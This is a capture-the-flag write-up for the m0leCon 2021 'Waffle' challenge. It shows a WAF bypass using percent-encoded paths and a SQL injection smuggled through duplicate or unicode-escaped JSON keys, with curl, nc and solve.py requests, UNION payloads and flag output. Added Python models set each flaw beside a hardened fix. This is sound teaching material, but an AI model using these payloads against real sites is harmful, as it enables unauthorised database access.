m0leCon CTF 2021 Teaser — Bypassing WAF

M0lecon CTF 2021 Challenges

Challenge: Waffle

  • 1 Go App (main.go) — Well.. The main App
  • 1 Python/Flask App (waf.py) — The WAF 😡
  • /search
  • /gettoken
  • / (static files)

Beginning of the searchWaffle function

The Free Token

gettoken function on the main App

  • Gets the parameters creditcard and promocode
  • If promocode is “FREEWAF”, just returns the token!

Meet the WAF

  • The catch_all function processes all requests (except for /search below, which we’ll ignore for now).
  • If the request is for /gettoken, it reads the creditcard and promocode parameters (just like the main app).
  • If the promocode is FREEWAF, it BLOCKS THE REQUEST, returning an HTTP 400.
  • If it is not /gettoken, it just forwards the request to the main app, without the parameters (the else block).
$ curl localhost:1337/gettoken
{"err":"Paramerer 'creditcard' is missing"}

$ curl localhost:1337/gettoken?creditcard=123\&promocode=FREEWAF
{"err":"Sorry, this promo has expired"}

Round 1

$ python
Python 3.8.9 (default, Apr 3 2021, 01:00:00)
[GCC 7.5.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from urllib import parse
>>> gettoken_url = 'gettoken?promocode=FREEWAF&creditcard=yourcard'
>>> gettoken_url_bypass = parse.quote(gettoken_url)
>>> print(gettoken_url_bypass)
gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard
# waf.py: the promocode check inside catch_all, and the forward to the main app
if promo == 'FREEWAF':
    res = jsonify({'err': 'Sorry, this promo has expired'})
    res.status_code = 400
    return res
r = requests.get(appHost + path, params={'promocode': promo, 'creditcard': creditcard})
$ curl -v http://127.0.0.1:1337/gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard
* Trying 127.0.0.1:1337...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 1337 (#0)
> GET /gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard HTTP/1.1
> Host: 127.0.0.1:1337
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Set-Cookie: token=NEPTUNED
< Date: Sun, 30 May 2021 21:25:23 GMT
< Content-Length: 32
< Content-Type: text/plain; charset=utf-8
< Server: Werkzeug/1.0.1 Python/3.8.9
<
{"msg":"Take your free token!"}
* Closing connection 0
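The Round 1 bypass modelled end to end, as an added example that is not the challenge's waf.py. Flask hands the handler the percent-decoded path, so `/gettoken%3Fpromocode%3DFREEWAF` arrives as `/gettoken?promocode=FREEWAF`; the WAF decides on that decoded string and then rebuilds the upstream URL by concatenation, so the decoded `?` becomes a real query separator for the Go app. The hardened variant keeps the same policy but re-encodes the inspected path before forwarding. `APP_HOST` is a hypothetical upstream name standing in for the page's `appHost`.

```python
"""Model of the WAF's routing decision versus what the upstream app actually receives."""
from urllib.parse import parse_qs, quote, unquote, urlencode, urlsplit

APP_HOST = "http://app.internal"  # hypothetical upstream, the page's appHost

# The request target from the writeup (percent-encoded '?' and '&' in the path)
BYPASS = "/gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard"


def backend_view(url):
    """What the Go app routes on: the path it receives and the query it parses."""
    parts = urlsplit(url)
    return parts.path, {k: v[0] for k, v in parse_qs(parts.query).items()}


def _split(request_target):
    """Decoded path (as Flask delivers it to the handler) plus the real query parameters."""
    raw_path, _, query = request_target.partition("?")
    params = {k: v[0] for k, v in parse_qs(query).items()}
    return unquote(raw_path), params


def flawed_waf(request_target):
    """Shape of the original catch_all: None means HTTP 400, otherwise the URL fetched upstream."""
    path, params = _split(request_target)
    if path == "/gettoken":
        if params.get("promocode") == "FREEWAF":
            return None
        return APP_HOST + path + ("?" + urlencode(params) if params else "")
    # else branch: the decoded path is appended as-is and the parameters are dropped.
    # A '?' that was %3F in the request now starts a query string for the upstream app.
    return APP_HOST + path


def hardened_waf(request_target):
    """Same policy, but the upstream request is rebuilt from the inspected pieces:
    the path is re-encoded so a decoded '?', '=' or '&' stays a literal character."""
    path, params = _split(request_target)
    if path == "/gettoken" and params.get("promocode") == "FREEWAF":
        return None
    upstream = APP_HOST + quote(path, safe="/")
    if path == "/gettoken" and params:
        upstream += "?" + urlencode(params)
    return upstream


if __name__ == "__main__":
    for waf in (flawed_waf, hardened_waf):
        url = waf(BYPASS)
        print(waf.__name__, "->", backend_view(url) if url else "blocked")
```

Run as a script it prints the upstream view for both variants: the flawed WAF lets the Go app see `/gettoken` with `promocode=FREEWAF`, the hardened one forwards a literal `/gettoken%3F...` path that matches no route. The deeper fix is for the promocode check to live in the application itself rather than only in a proxy that parses the request differently from the backend.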

Searching the Flag

  • This is a POST endpoint, receiving JSON data.
  • It searches the waffle table by name, min and max radius, which are the parameters received in the JSON.
  • The JSON is parsed using the github.com/buger/jsonparser package.
  • Strings are concatenated to build the complete SQL command.
  • There are some very obvious SQL Injection vulnerabilities in the code.
  • The result rows are encoded as JSON and sent back.
$ curl -X POST -d {} http://127.0.0.1:1337/search
{"err":"You need a valid token"}
$ curl --cookie 'token=NEPTUNED' -d '{"name": "x"}' -X POST http://127.0.0.1:1337/search
[]
$ curl --cookie 'token=NEPTUNED' -d '{"name": "Neptunian"}' -X POST http://127.0.0.1:1337/search
[{"name":"Neptunian","radius":10,"height":10,"img_url":"http://localhost/img.png"}]
  • Tested without the token. We knew the main app would block it.
  • Tested with the token, using a random name parameter. No results.
  • Tested with the token, using a known name parameter. All the results for that name.

  • Parses the JSON body (j).
  • Checks that the value of the name parameter is an alphanumeric string.
  • Checks that the values of the min and max parameters are integers.
  • Ignores any other parameters.
  • If any parameter fails its check, blocks the request (HTTP 400).
  • If no problems are found, forwards the original request, unmodified, to the main app (keep that in mind).

Round 2

$ curl --cookie 'token=NEPTUNED' -d '{"name": "\"Neptunian"}' -X POST http://127.0.0.1:1337/search
{"err":"Bad request, filtered"}
$ nc 127.0.0.1 1337
POST /search HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Cookie: token=NEPTUNED
Content-Length: 33

{"name": "abc'", "name": "Hello"}

HTTP/1.0 500 INTERNAL SERVER ERROR
Date: Mon, 31 May 2021 00:07:28 GMT
Content-Length: 55
Content-Type: text/plain; charset=utf-8
Server: Werkzeug/1.0.1 Python/3.8.9

{"err":"DB error, something was wrong with the query"}

Capturing the Flag

SELECT name, radius, height, img_url FROM waffle
WHERE name = 'some_name'

SELECT name, radius, height, img_url FROM waffle
WHERE name = 'some_name'
UNION ALL SELECT 1, 2, 3, 4 from flag
WHERE ''='
'

SELECT name, radius, height, img_url FROM waffle
WHERE name = 'some_name'
UNION ALL SELECT flag, 2, 3, 'SQL Injected!' from flag
WHERE ''='
'
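The concatenated query beside a parameterised one, as an added example that is not the challenge's Go code. It is a stand-alone sqlite3 model of the page's two tables with constructed rows and a placeholder flag value; the payload string is the one from the writeup. It shows why the same input yields a UNION row from one version and an empty result from the other, and why an unbalanced quote turns into the "DB error" response seen in Round 2.

```python
"""String-built search query versus a bound parameter, on an in-memory sqlite3 database."""
import sqlite3


def make_db():
    """Constructed schema mirroring the writeup: a waffle table and a flag table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE waffle (name TEXT, radius INTEGER, height INTEGER, img_url TEXT);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO waffle VALUES ('Neptunian', 10, 10, 'http://localhost/img.png');
        INSERT INTO flag VALUES ('FLAG{constructed_placeholder}');
    """)
    return db


def search_concat(db, name):
    """The vulnerable pattern: the caller's string becomes part of the SQL text."""
    sql = "SELECT name, radius, height, img_url FROM waffle WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()


def search_param(db, name):
    """The fix: the value travels separately from the statement, so quotes in it are data."""
    sql = "SELECT name, radius, height, img_url FROM waffle WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()


def concat_breaks_query(db, name):
    """True when the concatenated statement is no longer valid SQL (the 500 'DB error' case)."""
    try:
        search_concat(db, name)
        return False
    except sqlite3.OperationalError:
        return True


# Payload from the writeup; the trailing ''=' pairs with the quote the query appends
PAYLOAD = "abc' UNION ALL SELECT flag, 1, 2, 'SQL Injected!' FROM flag WHERE ''='"

if __name__ == "__main__":
    db = make_db()
    print("concat :", search_concat(db, PAYLOAD))
    print("param  :", search_param(db, PAYLOAD))
    print("abc' breaks concat query:", concat_breaks_query(db, "abc'"))
```

With the bound parameter the whole payload is compared against the name column as one literal and nothing matches; the WAF's alphanumeric check becomes defence in depth rather than the only barrier.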
  • Get the token using the double-quote bypass (part 1)
  • Prepare the SQL Injection payload
  • Prepare the JSON data.
  • Send the payload, with the token cookie, using requests
$ python solve.py 
/gettoken Response: {"msg":"Take your free token!"}
Token: NEPTUNED
"{\"name\": \"abc' UNION ALL SELECT flag, 1, 2, 'SQL Injected!' FROM flag WHERE ''='\", \"name\": \"Hello\"}"
[{"name":"CTF{FLAG_HERE}","radius":1,"height":2,"img_url":"SQL Injected!"}]

$ python solve.py 
/gettoken Response: {"msg":"Take your free token!"}
Token: LQuKU5ViVGk4fsytWt9C
"{\"n\\u0061me\": \"abc' UNION ALL SELECT flag, 1, 2, 'SQL Injected!' FROM flag WHERE ''='\", \"name\": \"Hello\"}"
[{"name":"ptm{n3ver_ev3r_tru5t_4_pars3r!}","radius":1,"height":2,"img_url":"SQL Injected!"}]
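Why the WAF and the Go app disagreed about `name`, as an added example covering both the duplicate-key body from Round 2 and the `n\u0061me` spelling in the final run above. This block is not the challenge's code: the WAF side uses Python's `json` module as waf.py did (the last duplicate key wins, and `\u0061` is decoded to `a`), while the backend side is a small stand-in for a first-match key lookup, not the jsonparser library itself. Two candidate hardenings are included: a duplicate check on raw key text, which the escaped spelling slips past, and one on decoded keys that also refuses escaped keys outright. The payload bodies are constructed in the writeup's shape.

```python
"""Validator/consumer disagreement on JSON object keys, modelled on both sides in Python."""
import json
import re

# Raw "key": "value" pairs of a flat JSON object, keys and values left exactly as written
PAIR = re.compile(r'"((?:[^"\\]|\\.)*)"\s*:\s*"((?:[^"\\]|\\.)*)"')


def backend_lookup(body, wanted):
    """Stand-in for a first-match key lookup (not the real jsonparser): walk the pairs
    in order, decode each key's escapes, return the value of the first key equal to wanted."""
    for raw_key, raw_val in PAIR.findall(body):
        if json.loads(f'"{raw_key}"') == wanted:
            return json.loads(f'"{raw_val}"')
    return None


def lenient_waf_name(body):
    """What the original check saw: json.loads keeps the LAST duplicate key."""
    return json.loads(body).get("name")


def raw_dupe_waf_name(body):
    """A tempting but insufficient fix: reject duplicates by comparing raw key text."""
    raw_keys = [k for k, _ in PAIR.findall(body)]
    if len(raw_keys) != len(set(raw_keys)):
        raise ValueError("duplicate key")
    return json.loads(body).get("name")


def strict_waf_name(body):
    """Reject duplicates on DECODED keys and refuse any key containing an escape,
    so every parser downstream is forced to see the same single 'name'."""
    def no_dupes(pairs):
        keys = [k for k, _ in pairs]
        if len(keys) != len(set(keys)):
            raise ValueError("duplicate key after decoding")
        return dict(pairs)
    if any("\\" in k for k, _ in PAIR.findall(body)):
        raise ValueError("escaped characters in object key")
    return json.loads(body, object_pairs_hook=no_dupes).get("name")


def waf_verdict(check, body):
    """Apply one of the checks plus the page's alphanumeric rule for name."""
    try:
        name = check(body)
    except ValueError:
        return "blocked"
    return "allowed" if name is not None and name.isalnum() else "blocked"


# Constructed bodies in the writeup's shape: a duplicate key, then an escaped first key
DUP = '{"name": "abc\'", "name": "Hello"}'
ESC = '{"n\\u0061me": "abc\'", "name": "Hello"}'

if __name__ == "__main__":
    for label, body in (("duplicate", DUP), ("escaped", ESC)):
        print(label, "backend sees:", backend_lookup(body, "name"))
        for check in (lenient_waf_name, raw_dupe_waf_name, strict_waf_name):
            print("  ", check.__name__, waf_verdict(check, body))
```

The backend stand-in returns `abc'` for both bodies while the lenient check only ever sees `Hello`; the raw-text duplicate check stops the first body but not the escaped one. Only the decoded-key check with no escapes allowed blocks both, and even then the durable fix is the parameterised query in the app, since a proxy can never be sure it parses exactly like every consumer behind it.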

Neptunian

Weekend dad-joke hacker
